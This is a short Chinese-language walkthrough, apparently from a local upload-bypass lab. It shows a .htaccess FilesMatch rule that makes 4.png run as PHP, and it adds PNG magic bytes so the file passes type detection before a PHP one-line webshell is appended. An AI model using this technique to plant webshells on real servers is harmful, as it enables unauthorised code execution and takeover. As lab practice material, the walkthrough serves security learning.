一、类型:无法上传php等多种类型,选择.htaccess配置文件
二、.htaccess内容:(注意:不能命名,就叫.htaccess)
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
三、修改4.png的内容,在开头加入文件幻数检测绕过的png的value值:89 50 4E 47 0D 0A 1A 0A 00,在后面加入php一句话木马。
四、搜索路径localhost/upload/4.png查看4.png文件,成功